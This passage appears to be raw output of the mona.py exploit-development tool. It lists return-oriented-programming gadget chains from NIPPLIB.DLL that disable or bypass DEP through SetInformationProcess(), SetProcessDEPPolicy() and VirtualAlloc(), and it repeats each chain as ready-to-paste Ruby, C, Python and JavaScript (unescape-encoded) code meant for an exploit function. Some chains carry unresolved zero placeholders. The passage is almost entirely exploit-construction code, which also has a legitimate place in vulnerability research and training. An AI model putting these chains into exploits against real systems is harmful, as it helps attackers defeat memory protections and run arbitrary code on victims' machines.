      0x5c0839e1,  # PUSHAD # RETN [NIPPLIB.DLL] 
    ].flatten.pack("V*")

    return rop_gadgets

  end


  # Call the ROP chain generator inside the 'exploit' function :


  rop_chain = create_rop_chain()



*** [ C ] ***

  #define CREATE_ROP_CHAIN(name, ...) \
    int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
    unsigned int name[name##_length / sizeof(unsigned int)]; \
    create_rop_chain(name, ##__VA_ARGS__);

  int create_rop_chain(unsigned int *buf, unsigned int )
  {
    // rop chain generated with mona.py - www.corelan.be
    unsigned int rop_gadgets[] = {
      0x00000000,  // [-] Unable to find gadgets to pickup the desired API pointer into ebp
      0x00000000,  // [-] Unable to find ptr to &SetInformationProcess()
      0x5c088ca6,  // POP EBX // RETN [NIPPLIB.DLL] 
      0x00000022,  // 0x00000022-> edx
      0x5c0b9cdc,  // XOR EDX,EDX // RETN [NIPPLIB.DLL] 
      0x5c0b9c9e,  // ADD EDX,EBX // POP EBX // RETN 0x10 [NIPPLIB.DLL] 
      0x41414141,  // Filler (compensate)
      0x5c07cb4e,  // POP ECX // RETN [NIPPLIB.DLL] 
      0x41414141,  // Filler (RETN offset compensation)
      0x41414141,  // Filler (RETN offset compensation)
      0x41414141,  // Filler (RETN offset compensation)
      0x41414141,  // Filler (RETN offset compensation)
      0x5c00015c,  // &0x00000002 [NIPPLIB.DLL]
      0x5c06bc7d,  // POP EBX // RETN [NIPPLIB.DLL] 
      0xffffffff,  // 0xffffffff-> ebx
      0x5c049ea8,  // POP EAX // RETN [NIPPLIB.DLL] 
      0x00000004,  // 0x00000004-> eax
      0x5c075ffc,  // POP EDI // RETN [NIPPLIB.DLL] 
      0x5c075ffc,  // skip 4 bytes [NIPPLIB.DLL]
      0x5c0839e1,  // PUSHAD // RETN [NIPPLIB.DLL] 
    };
    if(buf != NULL) {
      memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
    };
    return sizeof(rop_gadgets);
  }

  // use the 'rop_chain' variable after this call, it's just an unsigned int[]
  CREATE_ROP_CHAIN(rop_chain, );
  // alternatively just allocate a large enough buffer and get the rop chain, i.e.:
  // unsigned int rop_chain[256];
  // int rop_chain_length = create_rop_chain(rop_chain, );

*** [ Python ] ***

  def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x00000000,  # [-] Unable to find gadgets to pickup the desired API pointer into ebp
      0x00000000,  # [-] Unable to find ptr to &SetInformationProcess()
      0x5c088ca6,  # POP EBX # RETN [NIPPLIB.DLL] 
      0x00000022,  # 0x00000022-> edx
      0x5c0b9cdc,  # XOR EDX,EDX # RETN [NIPPLIB.DLL] 
      0x5c0b9c9e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [NIPPLIB.DLL] 
      0x41414141,  # Filler (compensate)
      0x5c07cb4e,  # POP ECX # RETN [NIPPLIB.DLL] 
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x5c00015c,  # &0x00000002 [NIPPLIB.DLL]
      0x5c06bc7d,  # POP EBX # RETN [NIPPLIB.DLL] 
      0xffffffff,  # 0xffffffff-> ebx
      0x5c049ea8,  # POP EAX # RETN [NIPPLIB.DLL] 
      0x00000004,  # 0x00000004-> eax
      0x5c075ffc,  # POP EDI # RETN [NIPPLIB.DLL] 
      0x5c075ffc,  # skip 4 bytes [NIPPLIB.DLL]
      0x5c0839e1,  # PUSHAD # RETN [NIPPLIB.DLL] 
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

  rop_chain = create_rop_chain()



*** [ JavaScript ] ***

  //rop chain generated with mona.py - www.corelan.be
  rop_gadgets = unescape(
    "%u0000%u0000" + // 0x00000000 : ,# [-] Unable to find gadgets to pickup the desired API pointer into ebp
    "%u0000%u0000" + // 0x00000000 : ,# [-] Unable to find ptr to &SetInformationProcess()
    "%u8ca6%u5c08" + // 0x5c088ca6 : ,# POP EBX # RETN [NIPPLIB.DLL] 
    "%u0022%u0000" + // 0x00000022 : ,# 0x00000022-> edx
    "%u9cdc%u5c0b" + // 0x5c0b9cdc : ,# XOR EDX,EDX # RETN [NIPPLIB.DLL] 
    "%u9c9e%u5c0b" + // 0x5c0b9c9e : ,# ADD EDX,EBX # POP EBX # RETN 0x10 [NIPPLIB.DLL] 
    "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
    "%ucb4e%u5c07" + // 0x5c07cb4e : ,# POP ECX # RETN [NIPPLIB.DLL] 
    "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
    "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
    "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
    "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
    "%u015c%u5c00" + // 0x5c00015c : ,# &0x00000002 [NIPPLIB.DLL]
    "%ubc7d%u5c06" + // 0x5c06bc7d : ,# POP EBX # RETN [NIPPLIB.DLL] 
    "%uffff%uffff" + // 0xffffffff : ,# 0xffffffff-> ebx
    "%u9ea8%u5c04" + // 0x5c049ea8 : ,# POP EAX # RETN [NIPPLIB.DLL] 
    "%u0004%u0000" + // 0x00000004 : ,# 0x00000004-> eax
    "%u5ffc%u5c07" + // 0x5c075ffc : ,# POP EDI # RETN [NIPPLIB.DLL] 
    "%u5ffc%u5c07" + // 0x5c075ffc : ,# skip 4 bytes [NIPPLIB.DLL]
    "%u39e1%u5c08" + // 0x5c0839e1 : ,# PUSHAD # RETN [NIPPLIB.DLL] 
    ""); //  : 


--------------------------------------------------------------------------------------------------


################################################################################

Register setup for SetProcessDEPPolicy() :
--------------------------------------------
 EAX = <not used>
 ECX = <not used>
 EDX = <not used>
 EBX = dwFlags (ptr to 0x00000000)
 ESP = ReturnTo (automatic)
 EBP = ptr to SetProcessDEPPolicy()
 ESI = <not used>
 EDI = ROP NOP (4 byte stackpivot)
--------------------------------------------


ROP Chain for SetProcessDEPPolicy() [(XP SP3/Vista SP1/2008 Server SP1, can be called only once per process)] :
---------------------------------------------------------------------------------------------------------------

*** [ Ruby ] ***

  def create_rop_chain()

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = 
    [
      0x00000000,  # [-] Unable to find ptr to SetProcessDEPPolicy() (-> to be put in ebp)
      0x5c06e5b9,  # POP EBX # RETN [NIPPLIB.DLL] 
      0x5c0e5020,  # &0x00000000 [NIPPLIB.DLL]
      0x5c07946a,  # POP EDI # RETN [NIPPLIB.DLL] 
      0x5c07946a,  # skip 4 bytes [NIPPLIB.DLL]
      0x5c0839ac,  # PUSHAD # RETN [NIPPLIB.DLL] 
    ].flatten.pack("V*")

    return rop_gadgets

  end


  # Call the ROP chain generator inside the 'exploit' function :


  rop_chain = create_rop_chain()



*** [ C ] ***

  #define CREATE_ROP_CHAIN(name, ...) \
    int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
    unsigned int name[name##_length / sizeof(unsigned int)]; \
    create_rop_chain(name, ##__VA_ARGS__);

  int create_rop_chain(unsigned int *buf, unsigned int )
  {
    // rop chain generated with mona.py - www.corelan.be
    unsigned int rop_gadgets[] = {
      0x00000000,  // [-] Unable to find ptr to SetProcessDEPPolicy() (-> to be put in ebp)
      0x5c06e5b9,  // POP EBX // RETN [NIPPLIB.DLL] 
      0x5c0e5020,  // &0x00000000 [NIPPLIB.DLL]
      0x5c07946a,  // POP EDI // RETN [NIPPLIB.DLL] 
      0x5c07946a,  // skip 4 bytes [NIPPLIB.DLL]
      0x5c0839ac,  // PUSHAD // RETN [NIPPLIB.DLL] 
    };
    if(buf != NULL) {
      memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
    };
    return sizeof(rop_gadgets);
  }

  // use the 'rop_chain' variable after this call, it's just an unsigned int[]
  CREATE_ROP_CHAIN(rop_chain, );
  // alternatively just allocate a large enough buffer and get the rop chain, i.e.:
  // unsigned int rop_chain[256];
  // int rop_chain_length = create_rop_chain(rop_chain, );

*** [ Python ] ***

  def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x00000000,  # [-] Unable to find ptr to SetProcessDEPPolicy() (-> to be put in ebp)
      0x5c06e5b9,  # POP EBX # RETN [NIPPLIB.DLL] 
      0x5c0e5020,  # &0x00000000 [NIPPLIB.DLL]
      0x5c07946a,  # POP EDI # RETN [NIPPLIB.DLL] 
      0x5c07946a,  # skip 4 bytes [NIPPLIB.DLL]
      0x5c0839ac,  # PUSHAD # RETN [NIPPLIB.DLL] 
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

  rop_chain = create_rop_chain()



*** [ JavaScript ] ***

  //rop chain generated with mona.py - www.corelan.be
  rop_gadgets = unescape(
    "%u0000%u0000" + // 0x00000000 : ,# [-] Unable to find ptr to SetProcessDEPPolicy() (-> to be put in ebp)
    "%ue5b9%u5c06" + // 0x5c06e5b9 : ,# POP EBX # RETN [NIPPLIB.DLL] 
    "%u5020%u5c0e" + // 0x5c0e5020 : ,# &0x00000000 [NIPPLIB.DLL]
    "%u946a%u5c07" + // 0x5c07946a : ,# POP EDI # RETN [NIPPLIB.DLL] 
    "%u946a%u5c07" + // 0x5c07946a : ,# skip 4 bytes [NIPPLIB.DLL]
    "%u39ac%u5c08" + // 0x5c0839ac : ,# PUSHAD # RETN [NIPPLIB.DLL] 
    ""); //  : 


--------------------------------------------------------------------------------------------------


################################################################################

Register setup for VirtualAlloc() :
--------------------------------------------
 EAX = NOP (0x90909090)
 ECX = flProtect (0x40)
 EDX = flAllocationType (0x1000)
 EBX = dwSize
 ESP = lpAddress (automatic)
 EBP = ReturnTo (ptr to jmp esp)
 ESI = ptr to VirtualAlloc()
 EDI = ROP NOP (RETN)
 --- alternative chain ---
 EAX = ptr to &VirtualAlloc()
 ECX = flProtect (0x40)
 EDX = flAllocationType (0x1000)
 EBX = dwSize
 ESP = lpAddress (automatic)
 EBP = POP (skip 4 bytes)
 ESI = ptr to JMP [EAX]
 EDI = ROP NOP (RETN)
 + place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------


ROP Chain for VirtualAlloc() [(XP/2003 Server and up)] :
--------------------------------------------------------

*** [ Ruby ] ***

  def create_rop_chain()

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = 
    [
      0x5c0b8b99,  # POP EBP # RETN [NIPPLIB.DLL] 
      0x5c0b8b99,  # skip 4 bytes [NIPPLIB.DLL]
      0x5c070010,  # POP EBX # RETN [NIPPLIB.DLL] 
      0x00000001,  # 0x00000001-> ebx
      0x5c081656,  # POP EBX # RETN [NIPPLIB.DLL] 
      0x00001000,  # 0x00001000-> edx
      0x5c0b9cfc,  # XOR EDX,EDX # RETN [NIPPLIB.DLL] 
      0x5c0b9c9e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [NIPPLIB.DLL] 
      0x41414141,  # Filler (compensate)
      0x5c09d5c8,  # POP ECX # RETN [NIPPLIB.DLL] 
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x00000040,  # 0x00000040-> ecx
      0x5c075141,  # POP EDI # RETN [NIPPLIB.DLL] 
      0x5c075142,  # RETN (ROP NOP) [NIPPLIB.DLL]
      0x5c0984c5,  # POP ESI # RETN [NIPPLIB.DLL] 
      0x5c004277,  # JMP [EAX] [NIPPLIB.DLL]
      0x5c0529f8,  # POP EAX # RETN [NIPPLIB.DLL] 
      0x74981100,  # ptr to &VirtualAlloc() (skipped module criteria, check if pointer is reliable !) [IAT msxml3.dll]
      0x5c0839ac,  # PUSHAD # RETN [NIPPLIB.DLL] 
      0x5c0635b2,  # ptr to 'push esp # ret ' [NIPPLIB.DLL]
    ].flatten.pack("V*")

    return rop_gadgets

  end


  # Call the ROP chain generator inside the 'exploit' function :


  rop_chain = create_rop_chain()



*** [ C ] ***

  #define CREATE_ROP_CHAIN(name, ...) \
    int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
    unsigned int name[name##_length / sizeof(unsigned int)]; \
    create_rop_chain(name, ##__VA_ARGS__);

  int create_rop_chain(unsigned int *buf, unsigned int )
  {
    // rop chain generated with mona.py - www.corelan.be
    unsigned int rop_gadgets[] = {
      0x5c0b8b99,  // POP EBP // RETN [NIPPLIB.DLL] 
      0x5c0b8b99,  // skip 4 bytes [NIPPLIB.DLL]
      0x5c070010,  // POP EBX // RETN [NIPPLIB.DLL] 
      0x00000001,  // 0x00000001-> ebx
      0x5c081656,  // POP EBX // RETN [NIPPLIB.DLL] 
      0x00001000,  // 0x00001000-> edx
      0x5c0b9cfc,  // XOR EDX,EDX // RETN [NIPPLIB.DLL] 
      0x5c0b9c9e,  // ADD EDX,EBX // POP EBX // RETN 0x10 [NIPPLIB.DLL] 
      0x41414141,  // Filler (compensate)
      0x5c09d5c8,  // POP ECX // RETN [NIPPLIB.DLL] 
      0x41414141,  // Filler (RETN offset compensation)
      0x41414141,  // Filler (RETN offset compensation)
      0x41414141,  // Filler (RETN offset compensation)
      0x41414141,  // Filler (RETN offset compensation)
      0x00000040,  // 0x00000040-> ecx
      0x5c075141,  // POP EDI // RETN [NIPPLIB.DLL] 
      0x5c075142,  // RETN (ROP NOP) [NIPPLIB.DLL]
      0x5c0984c5,  // POP ESI // RETN [NIPPLIB.DLL] 
      0x5c004277,  // JMP [EAX] [NIPPLIB.DLL]
      0x5c0529f8,  // POP EAX // RETN [NIPPLIB.DLL] 
      0x74981100,  // ptr to &VirtualAlloc() (skipped module criteria, check if pointer is reliable !) [IAT msxml3.dll]
      0x5c0839ac,  // PUSHAD // RETN [NIPPLIB.DLL] 
      0x5c0635b2,  // ptr to 'push esp // ret ' [NIPPLIB.DLL]
    };
    if(buf != NULL) {
      memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
    };
    return sizeof(rop_gadgets);
  }

  // use the 'rop_chain' variable after this call, it's just an unsigned int[]
  CREATE_ROP_CHAIN(rop_chain, );
  // alternatively just allocate a large enough buffer and get the rop chain, i.e.:
  // unsigned int rop_chain[256];
  // int rop_chain_length = create_rop_chain(rop_chain, );

*** [ Python ] ***

  def create_rop_chain():

    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
      0x5c0b8b99,  # POP EBP # RETN [NIPPLIB.DLL] 
      0x5c0b8b99,  # skip 4 bytes [NIPPLIB.DLL]
      0x5c070010,  # POP EBX # RETN [NIPPLIB.DLL] 
      0x00000001,  # 0x00000001-> ebx
      0x5c081656,  # POP EBX # RETN [NIPPLIB.DLL] 
      0x00001000,  # 0x00001000-> edx
      0x5c0b9cfc,  # XOR EDX,EDX # RETN [NIPPLIB.DLL] 
      0x5c0b9c9e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [NIPPLIB.DLL] 
      0x41414141,  # Filler (compensate)
      0x5c09d5c8,  # POP ECX # RETN [NIPPLIB.DLL] 
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x41414141,  # Filler (RETN offset compensation)
      0x00000040,  # 0x00000040-> ecx
      0x5c075141,  # POP EDI # RETN [NIPPLIB.DLL] 
      0x5c075142,  # RETN (ROP NOP) [NIPPLIB.DLL]
      0x5c0984c5,  # POP ESI # RETN [NIPPLIB.DLL] 
      0x5c004277,  # JMP [EAX] [NIPPLIB.DLL]
      0x5c0529f8,  # POP EAX # RETN [NIPPLIB.DLL] 
      0x74981100,  # ptr to &VirtualAlloc() (skipped module criteria, check if pointer is reliable !) [IAT msxml3.dll]
      0x5c0839ac,  # PUSHAD # RETN [NIPPLIB.DLL] 
      0x5c0635b2,  # ptr to 'push esp # ret ' [NIPPLIB.DLL]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

  rop_chain = create_rop_chain()



*** [ JavaScript ] ***

  //rop chain generated with mona.py - www.corelan.be
  rop_gadgets = unescape(
    "%u8b99%u5c0b" + // 0x5c0b8b99 : ,# POP EBP # RETN [NIPPLIB.DLL] 
    "%u8b99%u5c0b" + // 0x5c0b8b99 : ,# skip 4 bytes [NIPPLIB.DLL]
    "%u0010%u5c07" + // 0x5c070010 : ,# POP EBX # RETN [NIPPLIB.DLL] 
    "%u0001%u0000" + // 0x00000001 : ,# 0x00000001-> ebx
    "%u1656%u5c08" + // 0x5c081656 : ,# POP EBX # RETN [NIPPLIB.DLL] 
    "%u1000%u0000" + // 0x00001000 : ,# 0x00001000-> edx
    "%u9cfc%u5c0b" + // 0x5c0b9cfc : ,# XOR EDX,EDX # RETN [NIPPLIB.DLL] 
    "%u9c9e%u5c0b" + // 0x5c0b9c9e : ,# ADD EDX,EBX # POP EBX # RETN 0x10 [NIPPLIB.DLL] 
    "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
    "%ud5c8%u5c09" + // 0x5c09d5c8 : ,# POP ECX # RETN [NIPPLIB.DLL] 
    "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
    "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
    "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
    "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
    "%u0040%u0000" + // 0x00000040 : ,# 0x00000040-> ecx
    "%u5141%u5c07" + // 0x5c075141 : ,# POP EDI # RETN [NIPPLIB.DLL] 
    "%u5142%u5c07" + // 0x5c075142 : ,# RETN (ROP NOP) [NIPPLIB.DLL]
    "%u84c5%u5c09" + // 0x5c0984c5 : ,# POP ESI # RETN [NIPPLIB.DLL] 
    "%u4277%u5c00" + // 0x5c004277 : ,# JMP [EAX] [NIPPLIB.DLL]
    "%u29f8%u5c05" + // 0x5c0529f8 : ,# POP EAX # RETN [NIPPLIB.DLL] 
    "%u1100%u7498" + // 0x74981100 : ,# ptr to &VirtualAlloc() (skipped module criteria, check if pointer is reliable !) [IAT msxml3.dll]
    "%u39ac%u5c08" + // 0x5c0839ac : ,# PUSHAD # RETN [NIPPLIB.DLL] 
    "%u35b2%u5c06" + // 0x5c0635b2 : ,# ptr to 'push esp # ret ' [NIPPLIB.DLL]
    ""); //  : 


--------------------------------------------------------------------------------------------------

